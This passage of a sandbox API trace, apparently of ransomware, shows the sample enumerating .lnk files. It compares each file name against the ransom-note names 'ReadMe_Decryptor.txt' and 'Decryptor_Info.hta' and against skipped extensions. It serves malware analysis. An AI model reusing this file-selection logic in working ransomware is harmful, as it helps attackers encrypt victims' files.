(lpString1="gwPqcUu.flv.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.755] PathFindExtensionW (pszPath="gwPqcUu.flv.lnk") returned=".lnk" [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.755] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe306f4a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe306f4a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3095600, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GY2jO5AIo.lnk", cAlternateFileName="GY2JO5~1.LNK")) returned 1 [0084.755] lstrcmpW (lpString1="GY2jO5AIo.lnk", lpString2=".") returned 1 [0084.755] lstrcmpW (lpString1="GY2jO5AIo.lnk", lpString2="..") returned 1 [0084.755] lstrcmpiW (lpString1="GY2jO5AIo.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.755] lstrcmpiW (lpString1="GY2jO5AIo.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.755] PathFindExtensionW (pszPath="GY2jO5AIo.lnk") returned=".lnk" [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.755] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3c7c400, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3c7c400, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3c7c400, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xedf, dwReserved0=0x0, dwReserved1=0x0, cFileName="hJtjl183fKKBlg.lnk", cAlternateFileName="HJTJL1~1.LNK")) returned 1 [0084.755] lstrcmpW (lpString1="hJtjl183fKKBlg.lnk", lpString2=".") returned 1 [0084.755] lstrcmpW (lpString1="hJtjl183fKKBlg.lnk", lpString2="..") returned 1 [0084.755] lstrcmpiW (lpString1="hJtjl183fKKBlg.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.755] lstrcmpiW (lpString1="hJtjl183fKKBlg.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.755] PathFindExtensionW (pszPath="hJtjl183fKKBlg.lnk") returned=".lnk" [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.755] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.756] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e1f320, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3e1f320, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3e1f320, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf05, dwReserved0=0x0, dwReserved1=0x0, cFileName="HKcMH3d.lnk", cAlternateFileName="")) returned 1 [0084.756] lstrcmpW (lpString1="HKcMH3d.lnk", lpString2=".") returned 1 [0084.756] lstrcmpW (lpString1="HKcMH3d.lnk", lpString2="..") returned 1 [0084.756] lstrcmpiW (lpString1="HKcMH3d.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.756] lstrcmpiW (lpString1="HKcMH3d.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.756] PathFindExtensionW (pszPath="HKcMH3d.lnk") returned=".lnk" [0084.756] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.756] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.756] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.756] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c8d880, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4c8d880, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4c8d880, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa79, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6NYZGIEzY8oBlMt.lnk", cAlternateFileName="I6NYZG~1.LNK")) returned 1 [0084.756] lstrcmpW (lpString1="i6NYZGIEzY8oBlMt.lnk", lpString2=".") returned 1 [0084.756] lstrcmpW (lpString1="i6NYZGIEzY8oBlMt.lnk", lpString2="..") returned 1 [0084.756] lstrcmpiW (lpString1="i6NYZGIEzY8oBlMt.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.756] lstrcmpiW (lpString1="i6NYZGIEzY8oBlMt.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.756] PathFindExtensionW (pszPath="i6NYZGIEzY8oBlMt.lnk") returned=".lnk" [0084.756] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.756] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.756] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.756] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2e0dea0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4d98220, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4d98220, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0x0, dwReserved1=0x0, cFileName="iBv5EKoZPKsYY3c2pl.lnk", cAlternateFileName="IBV5EK~1.LNK")) returned 1 [0084.756] lstrcmpW (lpString1="iBv5EKoZPKsYY3c2pl.lnk", lpString2=".") returned 1 [0084.756] lstrcmpW (lpString1="iBv5EKoZPKsYY3c2pl.lnk", lpString2="..") returned 1 [0084.756] lstrcmpiW (lpString1="iBv5EKoZPKsYY3c2pl.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.757] lstrcmpiW (lpString1="iBv5EKoZPKsYY3c2pl.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.757] PathFindExtensionW (pszPath="iBv5EKoZPKsYY3c2pl.lnk") returned=".lnk" [0084.757] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.757] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.757] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5045ae0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe5045ae0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe5045ae0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x239, dwReserved0=0x0, dwReserved1=0x0, cFileName="iE jK0f.lnk", cAlternateFileName="IEJK0F~1.LNK")) returned 1 [0084.757] lstrcmpW (lpString1="iE jK0f.lnk", lpString2=".") returned 1 [0084.757] lstrcmpW (lpString1="iE jK0f.lnk", lpString2="..") returned 1 [0084.757] lstrcmpiW (lpString1="iE jK0f.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.757] lstrcmpiW (lpString1="iE jK0f.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.757] PathFindExtensionW (pszPath="iE jK0f.lnk") returned=".lnk" [0084.757] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.757] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.757] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.757] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4cffca0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4cffca0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4cffca0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="IJCqd3wVZrXsDATLtHc.lnk", cAlternateFileName="IJCQD3~1.LNK")) returned 1 [0084.757] lstrcmpW (lpString1="IJCqd3wVZrXsDATLtHc.lnk", lpString2=".") returned 1 [0084.757] lstrcmpW (lpString1="IJCqd3wVZrXsDATLtHc.lnk", lpString2="..") returned 1 [0084.757] lstrcmpiW (lpString1="IJCqd3wVZrXsDATLtHc.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.757] lstrcmpiW (lpString1="IJCqd3wVZrXsDATLtHc.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.758] PathFindExtensionW (pszPath="IJCqd3wVZrXsDATLtHc.lnk") returned=".lnk" [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.758] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe256cee0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe256cee0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe256cee0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x149e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J1KsjGDILiAYXKKh11.lnk", cAlternateFileName="J1KSJG~1.LNK")) returned 1 [0084.758] lstrcmpW (lpString1="J1KsjGDILiAYXKKh11.lnk", lpString2=".") returned 1 [0084.758] lstrcmpW (lpString1="J1KsjGDILiAYXKKh11.lnk", lpString2="..") returned 1 [0084.758] lstrcmpiW (lpString1="J1KsjGDILiAYXKKh11.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.758] lstrcmpiW (lpString1="J1KsjGDILiAYXKKh11.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.758] PathFindExtensionW (pszPath="J1KsjGDILiAYXKKh11.lnk") returned=".lnk" [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.758] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3cc86c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3cc86c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3cc86c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1440, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jdz87Z7UuKq.lnk", cAlternateFileName="JDZ87Z~1.LNK")) returned 1 [0084.758] lstrcmpW (lpString1="Jdz87Z7UuKq.lnk", lpString2=".") returned 1 [0084.758] lstrcmpW (lpString1="Jdz87Z7UuKq.lnk", lpString2="..") returned 1 [0084.758] lstrcmpiW (lpString1="Jdz87Z7UuKq.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.758] lstrcmpiW (lpString1="Jdz87Z7UuKq.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.758] PathFindExtensionW (pszPath="Jdz87Z7UuKq.lnk") returned=".lnk" [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.758] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.759] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4dbe380, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4dbe380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4dbe380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa63, dwReserved0=0x0, dwReserved1=0x0, cFileName="JEiqR VtRuOS5n.lnk", cAlternateFileName="JEIQRV~1.LNK")) returned 1 [0084.759] lstrcmpW (lpString1="JEiqR VtRuOS5n.lnk", lpString2=".") returned 1 [0084.759] lstrcmpW (lpString1="JEiqR VtRuOS5n.lnk", lpString2="..") returned 1 [0084.759] lstrcmpiW (lpString1="JEiqR VtRuOS5n.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.759] lstrcmpiW (lpString1="JEiqR VtRuOS5n.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.759] PathFindExtensionW (pszPath="JEiqR VtRuOS5n.lnk") returned=".lnk" [0084.759] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.759] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.759] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.759] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3edda00, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3edda00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3edda00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x415, dwReserved0=0x0, dwReserved1=0x0, cFileName="JFswZvJ4Guw8UXBBx.lnk", cAlternateFileName="JFSWZV~1.LNK")) returned 1 [0084.759] lstrcmpW (lpString1="JFswZvJ4Guw8UXBBx.lnk", lpString2=".") returned 1 [0084.759] lstrcmpW (lpString1="JFswZvJ4Guw8UXBBx.lnk", lpString2="..") returned 1 [0084.759] lstrcmpiW (lpString1="JFswZvJ4Guw8UXBBx.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.759] lstrcmpiW (lpString1="JFswZvJ4Guw8UXBBx.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.759] PathFindExtensionW (pszPath="JFswZvJ4Guw8UXBBx.lnk") returned=".lnk" [0084.759] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.759] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.759] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.759] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f64b00, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4f612a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4f612a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="JLFA_1FUVmjqhBBj.lnk", cAlternateFileName="JLFA_1~1.LNK")) returned 1 [0084.759] lstrcmpW (lpString1="JLFA_1FUVmjqhBBj.lnk", lpString2=".") returned 1 [0084.759] lstrcmpW (lpString1="JLFA_1FUVmjqhBBj.lnk", lpString2="..") returned 1 [0084.759] lstrcmpiW (lpString1="JLFA_1FUVmjqhBBj.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.759] lstrcmpiW (lpString1="JLFA_1FUVmjqhBBj.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.759] PathFindExtensionW (pszPath="JLFA_1FUVmjqhBBj.lnk") returned=".lnk" [0084.759] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.760] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4543520, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4543520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4543520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="K2SQa33U.lnk", cAlternateFileName="")) returned 1 [0084.760] lstrcmpW (lpString1="K2SQa33U.lnk", lpString2=".") returned 1 [0084.760] lstrcmpW (lpString1="K2SQa33U.lnk", lpString2="..") returned 1 [0084.760] lstrcmpiW (lpString1="K2SQa33U.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.760] lstrcmpiW (lpString1="K2SQa33U.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.760] PathFindExtensionW (pszPath="K2SQa33U.lnk") returned=".lnk" [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.760] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe501f980, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe501f980, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe501f980, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="KEGoi X095C.lnk", cAlternateFileName="KEGOIX~1.LNK")) returned 1 [0084.760] lstrcmpW (lpString1="KEGoi X095C.lnk", lpString2=".") returned 1 [0084.760] lstrcmpW (lpString1="KEGoi X095C.lnk", lpString2="..") returned 1 [0084.760] lstrcmpiW (lpString1="KEGoi X095C.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.760] lstrcmpiW (lpString1="KEGoi X095C.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.760] PathFindExtensionW (pszPath="KEGoi X095C.lnk") returned=".lnk" [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.760] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.760] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3c562a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe3c562a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe3c562a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf44, dwReserved0=0x0, dwReserved1=0x0, cFileName="kHJ5kos3a70S.lnk", cAlternateFileName="KHJ5KO~1.LNK")) returned 1 [0084.760] lstrcmpW (lpString1="kHJ5kos3a70S.lnk", lpString2=".") returned 1 [0084.760] lstrcmpW (lpString1="kHJ5kos3a70S.lnk", lpString2="..") returned 1 [0084.760] lstrcmpiW (lpString1="kHJ5kos3a70S.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.760] lstrcmpiW (lpString1="kHJ5kos3a70S.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.761] PathFindExtensionW (pszPath="kHJ5kos3a70S.lnk") returned=".lnk" [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.761] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38c41a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe41d7580, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe41d7580, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x9ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="kIDHyfQX1yLoRcXeY.lnk", cAlternateFileName="KIDHYF~1.LNK")) returned 1 [0084.761] lstrcmpW (lpString1="kIDHyfQX1yLoRcXeY.lnk", lpString2=".") returned 1 [0084.761] lstrcmpW (lpString1="kIDHyfQX1yLoRcXeY.lnk", lpString2="..") returned 1 [0084.761] lstrcmpiW (lpString1="kIDHyfQX1yLoRcXeY.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.761] lstrcmpiW (lpString1="kIDHyfQX1yLoRcXeY.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.761] PathFindExtensionW (pszPath="kIDHyfQX1yLoRcXeY.lnk") returned=".lnk" [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.761] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11c9960, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4ba9040, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4ba9040, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x9a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="KjWgNXSB5P.lnk", cAlternateFileName="KJWGNX~1.LNK")) returned 1 [0084.761] lstrcmpW (lpString1="KjWgNXSB5P.lnk", lpString2=".") returned 1 [0084.761] lstrcmpW (lpString1="KjWgNXSB5P.lnk", lpString2="..") returned 1 [0084.761] lstrcmpiW (lpString1="KjWgNXSB5P.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.761] lstrcmpiW (lpString1="KjWgNXSB5P.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.761] PathFindExtensionW (pszPath="KjWgNXSB5P.lnk") returned=".lnk" [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.761] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.761] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe483d0a0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe483d0a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe483d0a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x149e, dwReserved0=0x0, dwReserved1=0x0, cFileName="kULwRqWQAKmsRW8M i.lnk", cAlternateFileName="KULWRQ~1.LNK")) returned 1 [0084.762] lstrcmpW (lpString1="kULwRqWQAKmsRW8M i.lnk", lpString2=".") returned 1 [0084.762] lstrcmpW (lpString1="kULwRqWQAKmsRW8M i.lnk", lpString2="..") returned 1 [0084.762] lstrcmpiW (lpString1="kULwRqWQAKmsRW8M i.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.762] lstrcmpiW (lpString1="kULwRqWQAKmsRW8M i.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.762] PathFindExtensionW (pszPath="kULwRqWQAKmsRW8M i.lnk") returned=".lnk" [0084.762] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.762] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.762] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.762] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32123c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe418b2c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe418b2c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x134a, dwReserved0=0x0, dwReserved1=0x0, cFileName="kze0OTs.lnk", cAlternateFileName="")) returned 1 [0084.762] lstrcmpW (lpString1="kze0OTs.lnk", lpString2=".") returned 1 [0084.762] lstrcmpW (lpString1="kze0OTs.lnk", lpString2="..") returned 1 [0084.762] lstrcmpiW (lpString1="kze0OTs.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.762] lstrcmpiW (lpString1="kze0OTs.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.762] PathFindExtensionW (pszPath="kze0OTs.lnk") returned=".lnk" [0084.762] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.762] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.762] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.762] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe512a320, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe512a320, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe512a320, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0xf21, dwReserved0=0x0, dwReserved1=0x0, cFileName="LIiA6CYhFIFxPATDFSfb.lnk", cAlternateFileName="LIIA6C~1.LNK")) returned 1 [0084.762] lstrcmpW (lpString1="LIiA6CYhFIFxPATDFSfb.lnk", lpString2=".") returned 1 [0084.762] lstrcmpW (lpString1="LIiA6CYhFIFxPATDFSfb.lnk", lpString2="..") returned 1 [0084.762] lstrcmpiW (lpString1="LIiA6CYhFIFxPATDFSfb.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.762] lstrcmpiW (lpString1="LIiA6CYhFIFxPATDFSfb.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.763] PathFindExtensionW (pszPath="LIiA6CYhFIFxPATDFSfb.lnk") returned=".lnk" [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.763] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.763] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe34739c0, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe34739c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe34739c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x19e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ljV0AFrtFxxFy9Liq.lnk", cAlternateFileName="LJV0AF~1.LNK")) returned 1 [0084.763] lstrcmpW (lpString1="ljV0AFrtFxxFy9Liq.lnk", lpString2=".") returned 1 [0084.763] lstrcmpW 